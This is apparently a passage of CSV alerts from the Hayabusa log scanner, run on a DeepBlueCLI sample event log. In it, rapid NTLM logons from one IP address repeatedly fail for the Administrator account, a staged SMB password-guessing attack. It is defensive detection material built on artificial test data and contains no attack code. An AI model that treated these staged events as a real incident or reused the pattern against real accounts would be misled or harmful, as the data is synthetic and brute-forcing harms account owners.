192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.163 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.233 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.286 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.443 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.487 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.522 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.643 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.762 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.805 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.971 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.015 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.058 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.090 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.146 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.302 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.361 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.429 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.485 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.538 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.672 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:44.834 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.020 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.114 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.279 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.327 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.368 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.418 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.470 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.541 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.588 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.725 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.046 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.171 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.293 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.341 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.463 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:46.680 
